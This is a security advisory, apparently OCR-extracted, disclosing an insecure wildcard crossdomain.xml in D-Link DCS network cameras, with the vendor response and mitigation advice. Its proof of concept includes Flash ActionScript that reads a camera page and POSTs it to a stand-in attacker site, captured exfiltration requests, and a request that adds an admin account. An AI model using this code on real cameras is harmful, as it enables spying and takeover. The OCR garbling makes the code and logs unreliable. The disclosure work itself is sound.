Qualys Security Advisory QSA-2017-02-22 


February 22, 2017 


Insecure CrossDomain.XML in D-Link DCS Series Cameras 


SYNOPSIS: 


D-Link DCS series network cameras have a weak/insecure CrossDomain.XML file which allows sites hosting 
malicious flash object to access and/or change device’s settings. 


Reference: http://us.dlink.com/product-category/home-solutions/view/network-cameras 


CVE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7852 


Vendor Response: In 2016 we phased in CSRF mitigation on all CGI on the cameras so an injection like 
this would not be allowed authenticated or unauthenticated. 


Please refer to the tracking table at the bottom of this report which includes the H/W Revision and 
firmware when this CSRF mitigation was enabled. 


VULNERABILITY DETAILS: 
Lab Setup: 


Target Camera: DCS-933L with firmware version 1.03 

Target IP Address: 10X.X.X.X 

Site Hosting Malicious Flash Object: http://Maliciousxxxx.com 
Camera settings sent to: http://MyMaliciousSite.com 


pe eS 


Vulnerable/Tested Version: 


DCS-933L running firmware version 1.03 is affected. However, the latest firmware for this device and as 
well as other devices like DCS-5030L, DCS-5020L, DCS-2530L, DCS-2630L, DCS-930L, DCS-932L, 
DCS-932LB1 etc. have same file containing weak or improper configurations 


_DCS-933L_v1.13.05.bin.extracted > _50040.extracted > _3B0000.extracted > cpio-root > etc ro > web ν ୯ Search web P 
Name e Date modified Type Size 4 
| 469 File folder 
[4 pack File folder 
|&| account.htm Firefox HTML Doc 4 ΚΒ 
।€¦ advanced.htm Firefox HTML Doc... 16 KB 
(&| aplist.htm Firefox HTML Doc 5 ΚΒ 
| audio.htm Firefox HTML Doc 9 KB 
|&| aview.htm Firefox HTML Doc... 10 KB 
|&) bootver.htm Firefox HTML Doc 1 KB 
|&| clients.htm Firefox HTML Doc... 3 KB 
(€ crossdomain.xml XML Document 1 KB 
5 PM Firefoy HIML Dac 10 KR 


3 crossdomain.xml - Notepad - 


[ει Ri] [୫ 


File Edit Format View Help 


Κλχπ] version-"1.0"?»«!DOCTYPE cross-domain-policy SYSTEM "http: //www.adobe.com/xml/dtds/cross-domain-policy.dtd"» 
«cross -domain-policy» 

«allow-access-from domain-"*" secure-"true" /» 
</cross-domain-policy> 


[&. [e [8, (€, [EU whe 


All domains are allowed to access objects from this device. 


Note: It seems that all DCS series network cameras have same file containing weak or improper configurations 
but I haven't checked it on all models. 


Vulnerability: Insecure CrossDomain.XML file vulnerability 


An unauthenticated, remote attacker could host a malicious Flash file on his website that makes requests to 
the victim's device without having credentials. 


Risk Factor: High 


Impact: 


If a victim is logged in to the camera's web console and visits a malicious site hosting a malicious Flash file 
from another tab in the same browser, the malicious flash file then can send requests to the victims DCS series 
Camera without knowing the credentials. 


An attacker can host a malicious Flash file which can retrieve Live Feeds or information from victims DCS 
series Camera, add new admin users or make other changes to the device. 


CVSS Score: AV: N/AC: L/AU: N/C:C/I: N/A:C 


Proof-Of-Concept: 


1. Build a Flash file using Flex SDK which would access Advance.htm from target device and send the 
response to attacker's site. 


Test4 - FlashDevelop 
File Edit View Search Debug Project Insert Refactor Tools Macros Syntax Help 


B g E ex B D$ vOG- Sb Debug - τ 
FlashTest.as (Test3) ^^ FlashTest.as (Test4)* 
package { 


import flash.display.Sprite; 
import flash.events.*; 

import flash.net.URLRequestMethod; 
import flash.net.URLRequ 
import flash.net.UR ader; 

public class FlashT extends Sprite { 


uv δω ο 


8 public function FlashTest() { 


11 var readFrom:String = "http://1 0 MEN advanced. htm"; — 3 Target Device 


12 var readRequest:URLRequest = new URLlRequest(readFrom); 


13 var getLoader:URLLoader - new URLLoader(); 
14 getLoader.addEventListener(Event.COMPLETE, eventHandler); 
15 try 
16 1 
17 getLoader.load(readRequest);| 
8 Y 
J 
catch(error:Error) 
r 
í 


ν 
^ 


23 } 
25 private function eventHandler(event: Event): void 
26 r 
26 1 
27 var sendTO:String = "http://mymalicioussite.com/"; -— S Attacker's Site 
28 var sendRequest:URLRequest = new URLRequest(sendTO); 
29 sendRequest.method = URLRequestMethod.POST; 
sendRequest.data = event.target.data; 
var sendLoader:URLLoader = new URLLoader(); 
try 
i 
sendLoader.load(sendRequest) ; 
‡ 
catch(error:Error) 
i 


ατα, _ E 
Running process: C:\Program Files (x86) \FlashDevelop\Tools\fdbuild\fdbuild.exe "C:\Users\IEUser\Documents\Test4\Test4.as3proj” -ipc 422c577c-6765-451f£-94b9-¢ 


2. Download this file and copy it to the WebRoot of http://Maliciousxxxx.com 


root@kali: /var/www/html ooo 


File Edit View Search Terminal Help 


:/Ν8Γ/ itml# ls -liah FlashMe2.swf 
1710178 -rwxrwxrwx 1 root root 6.0K Feb 23 2017 


# 


3. Log into the Camera’s web admin console and then visit http://Maliciousxxxx.com/FlashMe2.swf 


୭ D-Link Corporation. | WIR... >< ^ http://malicio..m/FlashMe2.swt X + 


ANT ୪ = $ SQL- XSS- Encryption- Encoding- Other- 


4x Load URL 
Ü Split URL 


>) Execute 


L] Enable Post data  [ ] Enable Referrer 


Response to above request 


Filter: Hiding CSS, image and general binary content [2 
# αἰ Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title [Comment | SSL ΠΡ Cookies Time | Listener port | 
[50 http-//1i 82 GET id B Lj 200 827 HTML B 11:12:46 2... 8080 
51 http://1 82 GET function js?cidx-1.032014-02-11 B 200 15021 script js 8 11:12:51 2... 8080 
52 ΠΡΙ [82 GET Jhview.htm [5] B 200 1095 HTML htm D-Link Corporation. |. B 11:12:54 2... 8080 
55 — hitp//i 82 GET — function js?cidx1.032014-02-11 G 200 1501 scit js [s] 11:1255 2 _ 8080 
56 http :82 6୫୭୮ hicheck.htm C OG 20 7233 ΗΜ. htm D-Link Corporation. | a 14:12:68 2... 8080 
59 ΠΛ :82 GET — function js?cidx-1.032014-02-11 C] 200 1501 scit js a 14:12:69 2... 8080 
[60 http [82 GET —_/deploydava js?cidx=1.032014-0.. Β [] 200 12865 script js a 14:12:59 2... 8080 
167 Mm] GET — /crossdomain xml o OG 2 36 ΧΜ. xml [5] cz Ἢ 13:342.. 8080 
68 — http//10 GET — /advanced.htm Cj Ø 20 13931 HTML htm D-Link Corporation. | Ώ w 1:13:382.. 8080 
69 — http//mymalicioussite.com GET /ετοοοάοπιοίπ xml o Ø 20 49 ΧΙ xml o 92 11:13:38 2.. 8080 
70 — http://mymalicioussite.com POST / Cj 200 10980 HTML ‘Apache? Debian Def. B 92 11:13:38 2.. 8080 
Request 


[ον | Headers | Hex 


HTTP/1.1 200 OK 
Date: Thu, 23 Feb 2017 05:43:33 GMT 

Server: Apache/2.4.23 (Debian) 
Last-Modified: Thu, 23 Feb 2017 05:43:33 GMT 
ETag: W/"1717-5492efd077180" 

Accept-Ranges: bytes 

Content-Length: 6135 

Connection: close 

Content-Type: application/x-shockwave-flash 
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Flash object from Request#4 sends a GET request to http://CameralP/advanced.htm 


Filter: Hiding CSS, image and general binary content Victim visits FlashMe2.swf 

# ×» Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title | Comment [sst ΙΡ 

|50 παρ! ο) GET ! [5] O 200 827 ΗΓ Q 

51  htp/1 0-52 GET ` function jb?Lidx-1 032014-02-11 w C) 200 15021 script js =] 

52 http://1 0 62 GET  /hview.ht [5] Cj 200 1095 HTML htm D-Link Corporation. |.. i9] 

55 ୮୮/58 .62 GET ` functionls?cfix-1.032014-02-11 w O 200 15021 script js B 

56 πιιρ/1ΠΒΒβο; GET /hjcheck| B G 200 7233 HTML htm D-Link Corporation. |... 2] 

59 http ο; GET function jfidx=1.032014-0211 ` ¥ O 200 15021 ୫୩୮ js B 

60 —http://1 0 62 GET  /deployJavMfjs?cidx-1.032014-0... w C] 200 12865 script js ଇ 

6  http//maliciousllilccom GET /FlashMe2.swf B O 200 6407 flash swf B 192 11:13:33 2... 8080 
http://10 — 5 32 GET —/crossdomain.xrgl =} o 200 356 XML ο EE 11:13:34 2... 8080 
http://mymalicioussite.com B O 200 493 Ώ 11:13:38 2... 

70 http://mymalicioussite.com (Jj OO 200 10980 HTML Apache2 Debian Def.. B 192 11:13:38 2... 


/crossdomain. i N 
f 


Victim's browser reads 


Victim's browser posts response Victim's browser reads permissions from 


from target device to attacker's . . ,. permissions from target device 
I—7—3 advanced.htm from target attackers site = 
— 
Headers | Hex 
GET /advanced.htm HTTP/1.1 
Host: 10 .iB2 


User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 
Accept: text/html,application/xhtmlexml,application/xml;q-0.9,*/*;q-0.8 

: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://maliciousNM com/FlashMe?.svf «ασ ` Referred by attacker's site 
Authorization: Basic YWRtaW4é 

Connection: close 


Response to this request: 


67 GET /crossdomain.xml 


69 
70 


http://mymalicioussite.com GET /crossdomain.xml 
http://mymalicioussite.com POST / 


O 200 10980 HTML Apache2 Debian Def... L 


[Raw | Headers | Hex | HTML | Render 


HTTP/1.0 200 OK 

Server: alphapd 

Date: Sun Feb 9 00:29:33 2014 
Pragma: no-cache 
Cache-Control: no-cache 
Content-type: text/html 


<html> 
<head> 
<link rel="stylesheet" rev-"stylesheet" href-"dlink.css?cidx-1.032014-02-11" type="text/css"> 
<title>D-Link Corporation. | WIRELESS INTERNET CAMERA | MAINTENANCE | DEVICE MANAGEMENT</title> 
«meta http-equiv-"X-UA-Compatible" content-"requiresActiveX-true"» 
<meta content-"text/html; charset-windows-1252" http-equiv=Content-Type> 
«meta HTTP-EQUIV-"Pragma" CONTENT="no-cache"> 
«meta HTTP-EQUIV-"Expires" CONTENT="-1"> 
<script language-"Javascript" SRC-"function.js?cidx-1.032014-02-11"»«/script» 
«script language-"Javascript"» 
function InitAUTO() 
1 
frm - document.forms[1]: 
frm.0SDColorSel.value = frm.0SDColorY.value-r","-frm.0SDColorU.value-","-frm.O0SDColorV.value; 
clickCheck() ; 
H 
function clickCheck() 
t 


frm - document.forms[1]; 


if (frm. 0SDEnable [0] . checked) 
frm.0SDColorSel.disabled = false; 


else 
= HCM ATaeCAS GARE AA = +*==== - 


Flash object then sends above response that it received from the Camera to attacker's site 


Filter: Hiding CSS, image and general binary content 
| Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title | Comment | SSL [IP | Cookies | Time | Listener port | 

GET / D O 20 827 HM. o 10 11:12:46 2... 8080 
http://10) GET ffunction.js?cidx-1.032014-02-11 O 200 15021 script js { 10 11:12:51 2... 8080 
http://10) GET Jhview.htm B £] 200 1095 HTML htm D-Link Corporation. |. G 10 11:12:54 2 . 8080 
http://10) GET ffunction.js?cidx-1.032014-02-11 w L) 200 15021 script js LJ) 10 11:12:55 2... 8080 
http://10) GET Ihjcheck.htm B Ø 200 7233 HTML htm D-Link Corporation. |. Ώ 10 11:12:58 2... 8080 
http://10 GET function js?cidx=1.032014-02-11 — (MJ (J) 200 15021 script 5 o w 11:12:59 2... 8080 
http://10) GET ideployJava.js?cidx=1.032014-0. {] 20 12865 script js OO 10 11:12:59 2... 8080 
http://maliciougfill com GET  /FlashMe2.swf B 0] 200 6407 flash swf O 1920 41:13:33 2 _ 8080 
http://10 GET — /crossdomain xml B © 2 36 xw xml 8 —-28 11:13:34 2 _ 8080 
http://10 GET ladvanced.htm O O 200 13931 HTML htm D-Link Corporation. |. O 10 11:13:35 2... 8080 
69 http://mymalicioussite Icrossdomain.xml ΕΙ © 200 493 XML xml G 19. 11:13:38 2... 8080 


_ [93 Params | Headers | Hex | XML | 


POST / HTTP/1.1 

dud Αμμάν hehasiive collared Sensitive Information being sent to attacker controlled site 

User-Agent: Mozilla/5.0 (windoWS NT 10.0; WOWE4; rv:51.0) Gecko/20100101 Firefox/51.0 

Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*;q-0.8 

Accept-Language: en-US, en; q=0.5 

Accept-Encoding: gzip, deflate 

Connection: close 

Referer: http://maliciousNMEcom/FlashMe2.swf «<> Referred by an attacker controlled malicious site 
Content-type: application/x-www-form-urlencoded 

Content-Length: 13795 


<html> 
<head> 
<link rel="stylesheet" rev="stylesheet" href-"dlink.css?cidx-1.032014-02-11" type="text/css"> 
<title>D-Link Corporation. | WIRELESS INTERNET CAMERA | MAINTENANCE | DEVICE MANAGEMENT</title> 
<meta http-equiv-"X-UA-Compatible" content="requiresAct ivexX=true"> 
<meta content-"text/html; charset-windows-1252" http-equiv-Content-Type» 
<meta HTTP-EQUIV-"Pragma" CONTENT-"no-cache 
<meta HTTP-EQUIV-"Expires" CONTENT-"-1"» 
<script language-"Javascript" SRC-"function.js?cidx-1.032014-02-11"»«/script» 
<script language-"Javascript"» 
function InitAUTO() 
t 
frm - document.forms[1]; 
frm.OSDColorSel.value = frm.OSDColorY.value&","4frm.OSDColorU.value4", "4frm.OSDColorV.value; 
clickCheck(); 
) 
function clickCheck() 
t 
frm = document.forms[1]; 


> 


This way I could request other pages and retrieve sensitive information from the device like Live Video feed 
etc. I could even add an admin user to the device and following are the screenshots for the same. I used 
a publically available CrossDomain.XML Hacking Proof-of-Concept tool to do so. 


1. Following screenshots show there are no other users on the device at the moment: 


v| € |[Q Search 


Here you can change the administrator's password and configure the server setting for your 
camera. You can also add, modify and/or delete the user account(s). 


DMIN PASSWORD SETTING 


Old Password 
New Password 
Retype Password 


SERVER SETTING 
Camera Name DCS-933L 
LED Control * Normal ୦୮ 


User Access Control © Enable QJ Disable 


Snapshot URL Authentication ie Enable \ Disable (http//192.168.0.30:82/image/jpeg.cgi) 


OSD Time — Enable .*. Disable 
Color Red ¦ 


Apply ` _ Cancel 


ADD USER ACCOUNT 
User Name 

Password 

Retype Password 


USER LIST 


no. name 


suRuei Lance 


2. Request to add user admin1: 


€ ως, https:;//thehackerblog.com/crossdomain/index.html # | @ ® Q Search στ 8 
‘INT ~| = $ SQL- XSS- Encryption- Encoding- Other- 

αὐ Load URL 

Q Split URL 

» Execute 


Enable Post data [_] Enable Referrer 


crossdomain.xml PoC Tool 


By mandatory 


Response Clipboard 


Target URL: http//10 -B2/setSystemAddUser 
୯ GET ଓ) POST 


Request Headers: 


ioErrorHandler: [IOErrorEvent type-"ioError" bubbles-false cancelable-false 
eventPhase=2 text="Error #2032") 


( Custom headers only allowed for POST requests for scemily no reason ) 


Request Data: 


Content-Length: 121 


ReplySuccessPage=advanced. htm&ReplyErrorPage=errradv. htm&UserName=admin1&UserPassword=ad 


min&ChkPassword=admin&UserAdd=Add 


Execute 


3. User admin1 added successfully: 


5 ~v) 82/advanced.htm 


e | [ଠ୍‌ Search 


Admin 


Here you can change the administrators password and configure the server setting for your 
camera. You can also add, modify and/or delete the user account(s). 


ADMIN PASSWORD SETTING 


Old Password 


New Password 
Retype Password 


-Appy Cancel, 
Camera Name DCS-933L 
LED Control 5 Normal — Off 
User Access Control S Enable \ Disable 


Snapshot URL Authentication © Enable . Disable (http//192.168.0.30:82/Image/jpeg.cgi) 


OSD Time — Enable Disable 


Color Red ୪ 

Apply Cancel, 
User Name 
Password 
Retype Password 

—Add — | Cancel, 
USER LIST 

modify delete 


SURUEILLANCE 


Tracking Table: 


PSS । > || 2> || Sl >i S| 2> | Sl > | 2> 


Potential Mitigation per CWE: 


Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be 
implicitly trusted, and can perform two-way interaction with the target server. 


For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the 
possibility of an attacker planting extraneous cross-domain policy files on a server. 


Adobe Recommendation: http://www.adobe.com/devnet/flashplayer/articles/cross domain, policy.html 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research @ qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


